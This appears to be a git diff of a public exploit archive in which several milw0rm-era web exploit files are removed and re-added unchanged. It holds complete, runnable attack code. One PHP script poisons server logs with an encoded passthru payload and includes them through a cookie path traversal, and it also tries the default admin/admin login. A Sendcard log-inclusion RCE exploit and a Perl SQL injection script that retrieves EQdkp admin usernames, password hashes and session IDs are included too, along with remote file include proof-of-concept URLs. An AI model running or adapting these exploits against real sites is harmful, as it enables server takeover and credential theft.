-if( isset( $sLang ) && is_file( $config['dir_lang'].$sLang.'.php' ) && strlen( $sLang ) == 2 ){
-  setCookie( 'sLanguage', $sLang, time( ) + 86400 );
-  define( 'LANGUAGE', $sLang );
-}
-else{
-  if( isset( $_COOKIE['sLanguage'] ) )            <-------------------------[^]
-    define( 'LANGUAGE', $_COOKIE['sLanguage'] );    <-------------------------[^^]
-  else
-    define( 'LANGUAGE', $config['default_lang'] ); 
-}
-################################################################################
-
-and in index.php we can find line 32:
-
-################################################################################
-require_once DIR_LANG.LANGUAGE.'.php'; <-------------------------[^^^]
-################################################################################
-
-we can define LANGUAGE string. 
-
-Now how remote code execution:
-
-in admin panel can upload any file on serwer, if you have admin login and password. Default admin login and password in script is "admin" many users dont change it!!
-They don't edit file "config/general.php" lines 75-76:
-$config['login']		= "admin";
-$config['pass']		= "admin";
-
-;)
-
-Elo :)
-*/
-
-echo "insert evil code in logfiles to run local include ...\r\n\r\n";
-$hauru2 = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL".
-"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS".
-"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB".
-"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj".
-"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI".
-"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX".
-"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+");
-$pakiet="GET ".$p.$hauru2." HTTP/1.0\r\n";
-$pakiet.="User-Agent: ".$hauru2." Googlebot/2.1\r\n";
-$pakiet.="Host: ".$host."\r\n";
-$pakiet.="Connection: close\r\n\r\n";
-wyslijpakiet($pakiet);
-sleep(1);
-$paths= array (
-"../../../../../var/log/httpd/access_log",
-"../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../logs/error.log",
-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"../../../../../etc/httpd/logs/access_log",
-"../../../../../etc/httpd/logs/access.log",
-"../../../../../etc/httpd/logs/error_log",
-"../../../../../etc/httpd/logs/error.log",
-"../../../../../var/www/logs/access_log",
-"../../../../../var/www/logs/access.log",
-"../../../../../usr/local/apache/logs/access_log",
-"../../../../../usr/local/apache/logs/access.log",
-"../../../../../var/log/apache/access_log",
-"../../../../../var/log/apache/access.log",
-"../../../../../var/log/access_log",
-"../../../../../var/www/logs/error_log",
-"../../../../../var/www/logs/error.log",
-"../../../../../usr/local/apache/logs/error_log",
-"../../../../../usr/local/apache/logs/error.log",
-"../../../../../var/log/apache/error_log",
-"../../../../../var/log/apache/error.log",
-"../../../../../var/log/access_log",
-"../../../../../var/log/error_log"
-);
-for ($i=0; $i<=count($paths)-1; $i++)
-{$a=$i+2;
-echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
-echo "remote code execution...wait..\n";
-$pakiet ="GET ".$p."index.php HTTP/1.1\r\n";
-$pakiet.="Cookie: sLanguage=../".$paths[$i]."%00;\r\n";
-$pakiet.="HAURU: ".$cmd."\r\n";
-$pakiet.="Host: ".$host."\r\n";
-$pakiet.="Connection: Close\r\n\r\n";
-wyslijpakiet($pakiet);
-if (strstr($html,"Hauru"))
-{$temp=explode("Hauru",$html);
-die($temp[1]);
-}else{echo "can't run evil code :/ ..\n";}}
-$data   ="_POST[sLogin]=".$login."&_POST[sPass]=".$haslo."&submit=sign%20in%20»";
-$pakiet ="POST ".$p."admin.php?p=login HTTP/1.0\r\n";
-$pakiet.="Host: ".$host."\r\n";
-$pakiet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\r\n";
-$pakiet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$pakiet.="Content-Length: ".strlen($data)."\r\n";
-$pakiet.="Accept: text/plain\r\n";
-$pakiet.="Connection: Close\r\n\r\n";
-$pakiet.=$data;
-wyslijpakiet($pakiet);
-$temp=explode("Set-Cookie: ",$html);
-$cookie="";
-for ($i=1; $i
-
-# milw0rm.com [2007-06-02]
+ 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+
+function wyslijpakiet($pakiet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$pakiet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+}
+$host=$argv[1];
+$path=$argv[2];
+$port=80;
+$proxy="";
+$login="admin";
+$haslo="admin";
+$cmd="";
+for ($i=3; $i<$argc; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>'-p') and ($temp<>'-P')) {$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+if ($temp=="-L")
+{
+  $login=str_replace("-L","",$argv[$i]);
+}
+if ($temp=="-H")
+{
+  $haslo=str_replace("-H","",$argv[$i]);
+}
+}
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'bad patch!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+/*
+how its works :)
+
+in file "config/general.php" lines 12-33:
+
+################################################################################
+$config['dir_config']           = 'config/';
+$config['dir_core']             = 'core/';
+$config['dir_db']               = 'db/';
+$config['dir_js']               = 'js/';
+$config['dir_libraries']        = 'libraries/';
+$config['dir_tpl']              = 'templates/';
+$config['dir_files']            = 'files/';
+$config['dir_ext']              = 'ext/';
+$config['dir_plugins']          = 'plugins/';
+$config['dir_lang']             = 'lang/';
+
+if( isset( $sLang ) && is_file( $config['dir_lang'].$sLang.'.php' ) && strlen( $sLang ) == 2 ){
+  setCookie( 'sLanguage', $sLang, time( ) + 86400 );
+  define( 'LANGUAGE', $sLang );
+}
+else{
+  if( isset( $_COOKIE['sLanguage'] ) )            <-------------------------[^]
+    define( 'LANGUAGE', $_COOKIE['sLanguage'] );    <-------------------------[^^]
+  else
+    define( 'LANGUAGE', $config['default_lang'] ); 
+}
+################################################################################
+
+and in index.php we can find line 32:
+
+################################################################################
+require_once DIR_LANG.LANGUAGE.'.php'; <-------------------------[^^^]
+################################################################################
+
+we can define LANGUAGE string. 
+
+Now how remote code execution:
+
+in admin panel can upload any file on serwer, if you have admin login and password. Default admin login and password in script is "admin" many users dont change it!!
+They don't edit file "config/general.php" lines 75-76:
+$config['login']		= "admin";
+$config['pass']		= "admin";
+
+;)
+
+Elo :)
+*/
+
+echo "insert evil code in logfiles to run local include ...\r\n\r\n";
+$hauru2 = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL".
+"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS".
+"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB".
+"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj".
+"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI".
+"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX".
+"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+");
+$pakiet="GET ".$p.$hauru2." HTTP/1.0\r\n";
+$pakiet.="User-Agent: ".$hauru2." Googlebot/2.1\r\n";
+$pakiet.="Host: ".$host."\r\n";
+$pakiet.="Connection: close\r\n\r\n";
+wyslijpakiet($pakiet);
+sleep(1);
+$paths= array (
+"../../../../../var/log/httpd/access_log",
+"../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"../../../../../etc/httpd/logs/access_log",
+"../../../../../etc/httpd/logs/access.log",
+"../../../../../etc/httpd/logs/error_log",
+"../../../../../etc/httpd/logs/error.log",
+"../../../../../var/www/logs/access_log",
+"../../../../../var/www/logs/access.log",
+"../../../../../usr/local/apache/logs/access_log",
+"../../../../../usr/local/apache/logs/access.log",
+"../../../../../var/log/apache/access_log",
+"../../../../../var/log/apache/access.log",
+"../../../../../var/log/access_log",
+"../../../../../var/www/logs/error_log",
+"../../../../../var/www/logs/error.log",
+"../../../../../usr/local/apache/logs/error_log",
+"../../../../../usr/local/apache/logs/error.log",
+"../../../../../var/log/apache/error_log",
+"../../../../../var/log/apache/error.log",
+"../../../../../var/log/access_log",
+"../../../../../var/log/error_log"
+);
+for ($i=0; $i<=count($paths)-1; $i++)
+{$a=$i+2;
+echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
+echo "remote code execution...wait..\n";
+$pakiet ="GET ".$p."index.php HTTP/1.1\r\n";
+$pakiet.="Cookie: sLanguage=../".$paths[$i]."%00;\r\n";
+$pakiet.="HAURU: ".$cmd."\r\n";
+$pakiet.="Host: ".$host."\r\n";
+$pakiet.="Connection: Close\r\n\r\n";
+wyslijpakiet($pakiet);
+if (strstr($html,"Hauru"))
+{$temp=explode("Hauru",$html);
+die($temp[1]);
+}else{echo "can't run evil code :/ ..\n";}}
+$data   ="_POST[sLogin]=".$login."&_POST[sPass]=".$haslo."&submit=sign%20in%20»";
+$pakiet ="POST ".$p."admin.php?p=login HTTP/1.0\r\n";
+$pakiet.="Host: ".$host."\r\n";
+$pakiet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\r\n";
+$pakiet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$pakiet.="Content-Length: ".strlen($data)."\r\n";
+$pakiet.="Accept: text/plain\r\n";
+$pakiet.="Connection: Close\r\n\r\n";
+$pakiet.=$data;
+wyslijpakiet($pakiet);
+$temp=explode("Set-Cookie: ",$html);
+$cookie="";
+for ($i=1; $i
+
+# milw0rm.com [2007-06-02]
diff --git a/platforms/php/webapps/4029.php b/platforms/php/webapps/4029.php
index a87be293f..a8b6dcb44 100755
--- a/platforms/php/webapps/4029.php
+++ b/platforms/php/webapps/4029.php
@@ -1,176 +1,176 @@
-#!/usr/bin/php -q -d short_open_tag=on
-"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$code="";
-$packet="GET " . $p . $code . " HTTP/1.0\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
-$packet.="Host: " . $host . "\r\n";
-$packet.="Connection: close\r\n\r\n";
-
-sendpacketii($packet);
-sleep(3);
-
-$paths= array (
-"../../../../../var/log/httpd/access_log",
-"../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../logs/error.log",
-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"../../../../../etc/httpd/logs/access_log",
-"../../../../../etc/httpd/logs/access.log",
-"../../../../../etc/httpd/logs/error_log",
-"../../../../../etc/httpd/logs/error.log",
-"../../../../../var/www/logs/access_log",
-"../../../../../var/www/logs/access.log",
-"../../../../../usr/local/apache/logs/access_log",
-"../../../../../usr/local/apache/logs/access.log",
-"../../../../../var/log/apache/access_log",
-"../../../../../var/log/apache/access.log",
-"../../../../../var/log/access_log",
-"../../../../../var/www/logs/error_log",
-"../../../../../var/www/logs/error.log",
-"../../../../../usr/local/apache/logs/error_log",
-"../../../../../usr/local/apache/logs/error.log",
-"../../../../../var/log/apache/error_log",
-"../../../../../var/log/apache/error.log",
-"../../../../../var/log/access_log",
-"../../../../../var/log/error_log"
-);
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-$a=$i+2;
-
-$packet ="GET " . $p . "sendcard.php?sc_language=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
-$packet.="Host: " . $host . "\r\n"; 
-$packet.="Connection: Close\r\n\r\n";
-
-sendpacketii($packet);
-
-if (strstr($html,"w4ckw4ck"))
-    {
-     $temp=explode("w4ckw4ck",$html);
-	print "-------------------------------------------------------------------------\r\n";
-	print "             Sendcard <= 3.4.1 Remote Code Execution Exploit\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-        echo $temp[1];
-	print "-------------------------------------------------------------------------\r\n";
-	print "            		 http://www.w4ck1ng.com\r\n";
-	print "            		        ...Silentz\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-	exit;
-    }
-}
-
-	print "-------------------------------------------------------------------------\r\n";
-	print "             Sendcard <= 3.4.1 Remote Code Execution Exploit\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-        echo "[-] Exploit Failed...\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-	print "            		 http://www.w4ck1ng.com\r\n";
-	print "            		        ...Silentz\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-
-?>
-
-# milw0rm.com [2007-06-04]
+#!/usr/bin/php -q -d short_open_tag=on
+"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+$code="";
+$packet="GET " . $p . $code . " HTTP/1.0\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
+$packet.="Host: " . $host . "\r\n";
+$packet.="Connection: close\r\n\r\n";
+
+sendpacketii($packet);
+sleep(3);
+
+$paths= array (
+"../../../../../var/log/httpd/access_log",
+"../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"../../../../../etc/httpd/logs/access_log",
+"../../../../../etc/httpd/logs/access.log",
+"../../../../../etc/httpd/logs/error_log",
+"../../../../../etc/httpd/logs/error.log",
+"../../../../../var/www/logs/access_log",
+"../../../../../var/www/logs/access.log",
+"../../../../../usr/local/apache/logs/access_log",
+"../../../../../usr/local/apache/logs/access.log",
+"../../../../../var/log/apache/access_log",
+"../../../../../var/log/apache/access.log",
+"../../../../../var/log/access_log",
+"../../../../../var/www/logs/error_log",
+"../../../../../var/www/logs/error.log",
+"../../../../../usr/local/apache/logs/error_log",
+"../../../../../usr/local/apache/logs/error.log",
+"../../../../../var/log/apache/error_log",
+"../../../../../var/log/apache/error.log",
+"../../../../../var/log/access_log",
+"../../../../../var/log/error_log"
+);
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+$a=$i+2;
+
+$packet ="GET " . $p . "sendcard.php?sc_language=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
+$packet.="Host: " . $host . "\r\n"; 
+$packet.="Connection: Close\r\n\r\n";
+
+sendpacketii($packet);
+
+if (strstr($html,"w4ckw4ck"))
+    {
+     $temp=explode("w4ckw4ck",$html);
+	print "-------------------------------------------------------------------------\r\n";
+	print "             Sendcard <= 3.4.1 Remote Code Execution Exploit\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+        echo $temp[1];
+	print "-------------------------------------------------------------------------\r\n";
+	print "            		 http://www.w4ck1ng.com\r\n";
+	print "            		        ...Silentz\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+	exit;
+    }
+}
+
+	print "-------------------------------------------------------------------------\r\n";
+	print "             Sendcard <= 3.4.1 Remote Code Execution Exploit\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+        echo "[-] Exploit Failed...\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+	print "            		 http://www.w4ck1ng.com\r\n";
+	print "            		        ...Silentz\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+
+?>
+
+# milw0rm.com [2007-06-04]
diff --git a/platforms/php/webapps/4030.php b/platforms/php/webapps/4030.php
index f877b805d..676384a0d 100755
--- a/platforms/php/webapps/4030.php
+++ b/platforms/php/webapps/4030.php
@@ -1,85 +1,85 @@
-#!/usr/bin/perl -w
-
-#################################################################################
-#										#
-#		      EQdkp <= 1.3.2 SQL Injection Exploit			#
-#										#
-# Discovered by: Silentz							#
-# Payload: Admin Username & Hash Retrieval					#
-# Website: http://www.w4ck1ng.com						#
-# 										#
-# Vulnerable Code (listmembers.php):						#
-#										#
-#  $sql = 'SELECT m.*, (m.member_earned-m.member_spent+m.member_adjustment) 	#
-#  AS member_current, member_status, r.rank_name, r.rank_hide, r.rank_prefix, 	#
-#  r.rank_suffix, c.class_name AS member_class, c.class_armor_type AS 		#
-#  armor_type, c.class_min_level AS min_level, c.class_max_level AS max_level	#
-#  FROM ' . MEMBERS_TABLE . ' m, ' . MEMBER_RANKS_TABLE . ' r, ' . CLASS_TABLE 	#
-#  . ' c WHERE c.class_id = m.member_class_id AND (m.member_rank_id = 		#
-#  r.rank_id)';									#
-#    										#
-# 	if ( !empty($_GET['rank']) )						#
-#    {										#
-#        $sql .= " AND r.rank_name='" . urldecode($_GET['rank']) . "'";		#
-#    }										#
-#										#
-# PoC: http://victim.com/listmembers.php?show=all&rank=%2527 UNION SELECT 	#
-#      0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 	#
-#      FROM eqdkp_users where user_id=1/*					#
-# 										#
-# Subject To: Nothing, no authentication...nada!				#
-# GoogleDork: Get your own!							#
-#										#
-# Shoutz: The entire w4ck1ng community						#
-#										#
-#################################################################################
-
-use LWP::UserAgent;
-if (@ARGV < 1){
-print "-------------------------------------------------------------------------\r\n";
-print "                  EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print "Usage: w4ck1ng_eqdkp.pl [PATH]\r\n\r\n";
-print "[PATH] = Path where EQdkp is located\r\n\r\n";
-print "e.g. w4ck1ng_eqdkp.pl http://victim.com/eqdkp/\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print "            		 http://www.w4ck1ng.com\r\n";
-print "            		        ...Silentz\r\n";
-print "-------------------------------------------------------------------------\r\n";
-exit();
-}
-
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 FROM eqdkp_users where user_id=1/*";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-
-print "-------------------------------------------------------------------------\r\n";
-print "                  EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
-print "-------------------------------------------------------------------------\r\n";
-
-if($res->content =~ /">(.*?)<\/i><\/a><\/td>/){
-print "[+] Admin User : $1\n";}
-
-else {print "\n[-] Unable to retrieve admin username..."}
-
-if($res->content =~ /">([0-9a-fA-F]{32})<\/a><\/td>/){
-print "[+] Admin Hash : $1";}
-
-else {print "\n[-] Unable to retrieve admin hash...\n";}
-
-$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,session_id,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,NULL,NULL,0,0,0,0 FROM eqdkp_sessions where session_user_id=1/*";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-
-if($res->content =~ /">(.*?)<\/i><\/a><\/td>/){
-print "[+] Admin SessionID : $1\n";} 
-
-else {print "\n[-] Unable to retrieve admin sessionid...he/she is not logged in!\n";}
-
-print "-------------------------------------------------------------------------\r\n";
-print "            		 http://www.w4ck1ng.com\r\n";
-print "            		        ...Silentz\r\n";
-print "-------------------------------------------------------------------------\r\n";
-
-# milw0rm.com [2007-06-04]
+#!/usr/bin/perl -w
+
+#################################################################################
+#										#
+#		      EQdkp <= 1.3.2 SQL Injection Exploit			#
+#										#
+# Discovered by: Silentz							#
+# Payload: Admin Username & Hash Retrieval					#
+# Website: http://www.w4ck1ng.com						#
+# 										#
+# Vulnerable Code (listmembers.php):						#
+#										#
+#  $sql = 'SELECT m.*, (m.member_earned-m.member_spent+m.member_adjustment) 	#
+#  AS member_current, member_status, r.rank_name, r.rank_hide, r.rank_prefix, 	#
+#  r.rank_suffix, c.class_name AS member_class, c.class_armor_type AS 		#
+#  armor_type, c.class_min_level AS min_level, c.class_max_level AS max_level	#
+#  FROM ' . MEMBERS_TABLE . ' m, ' . MEMBER_RANKS_TABLE . ' r, ' . CLASS_TABLE 	#
+#  . ' c WHERE c.class_id = m.member_class_id AND (m.member_rank_id = 		#
+#  r.rank_id)';									#
+#    										#
+# 	if ( !empty($_GET['rank']) )						#
+#    {										#
+#        $sql .= " AND r.rank_name='" . urldecode($_GET['rank']) . "'";		#
+#    }										#
+#										#
+# PoC: http://victim.com/listmembers.php?show=all&rank=%2527 UNION SELECT 	#
+#      0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 	#
+#      FROM eqdkp_users where user_id=1/*					#
+# 										#
+# Subject To: Nothing, no authentication...nada!				#
+# GoogleDork: Get your own!							#
+#										#
+# Shoutz: The entire w4ck1ng community						#
+#										#
+#################################################################################
+
+use LWP::UserAgent;
+if (@ARGV < 1){
+print "-------------------------------------------------------------------------\r\n";
+print "                  EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "Usage: w4ck1ng_eqdkp.pl [PATH]\r\n\r\n";
+print "[PATH] = Path where EQdkp is located\r\n\r\n";
+print "e.g. w4ck1ng_eqdkp.pl http://victim.com/eqdkp/\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "            		 http://www.w4ck1ng.com\r\n";
+print "            		        ...Silentz\r\n";
+print "-------------------------------------------------------------------------\r\n";
+exit();
+}
+
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 FROM eqdkp_users where user_id=1/*";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+
+print "-------------------------------------------------------------------------\r\n";
+print "                  EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
+print "-------------------------------------------------------------------------\r\n";
+
+if($res->content =~ /">(.*?)<\/i><\/a><\/td>/){
+print "[+] Admin User : $1\n";}
+
+else {print "\n[-] Unable to retrieve admin username..."}
+
+if($res->content =~ /">([0-9a-fA-F]{32})<\/a><\/td>/){
+print "[+] Admin Hash : $1";}
+
+else {print "\n[-] Unable to retrieve admin hash...\n";}
+
+$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,session_id,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,NULL,NULL,0,0,0,0 FROM eqdkp_sessions where session_user_id=1/*";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+
+if($res->content =~ /">(.*?)<\/i><\/a><\/td>/){
+print "[+] Admin SessionID : $1\n";} 
+
+else {print "\n[-] Unable to retrieve admin sessionid...he/she is not logged in!\n";}
+
+print "-------------------------------------------------------------------------\r\n";
+print "            		 http://www.w4ck1ng.com\r\n";
+print "            		        ...Silentz\r\n";
+print "-------------------------------------------------------------------------\r\n";
+
+# milw0rm.com [2007-06-04]
diff --git a/platforms/php/webapps/4031.txt b/platforms/php/webapps/4031.txt
index 93c5a9f70..12ee6051f 100755
--- a/platforms/php/webapps/4031.txt
+++ b/platforms/php/webapps/4031.txt
@@ -1,22 +1,22 @@
-###########################################################
-
-Madirish Webmail v2.0  Remote File Include Vulnerabilities
-
-Author : BoZKuRTSeRDaR
-
-Contact MSN:BoZKuRTSeRDaR@BoZKuRTSeRDaR.CoM
-
-My Homepage :WwW.Turkmilliyetcileri.OrG
-
-script Download : http://sourceforge.net/projects/madirishwebmail
-
-###############################################################################
-
-code:
-require_once($GLOBALS['basedir']."lib/sql.php")
-
-exploit:
-
-http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?
-
-# milw0rm.com [2007-06-04]
+###########################################################
+
+Madirish Webmail v2.0  Remote File Include Vulnerabilities
+
+Author : BoZKuRTSeRDaR
+
+Contact MSN:BoZKuRTSeRDaR@BoZKuRTSeRDaR.CoM
+
+My Homepage :WwW.Turkmilliyetcileri.OrG
+
+script Download : http://sourceforge.net/projects/madirishwebmail
+
+###############################################################################
+
+code:
+require_once($GLOBALS['basedir']."lib/sql.php")
+
+exploit:
+
+http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?
+
+# milw0rm.com [2007-06-04]
diff --git a/platforms/php/webapps/4034.txt b/platforms/php/webapps/4034.txt
index 1a422562f..f22113428 100755
--- a/platforms/php/webapps/4034.txt
+++ b/platforms/php/webapps/4034.txt
@@ -1,36 +1,36 @@
-++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++
-+   K-letter 1.0 << Remote File include                             +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+   DownloadScript: http://www.scripts.com.ua/download.php?ID=813   +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+   Cyber-warrior.org <<< sanal alemin DEV.                         +
-+                                                                   +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
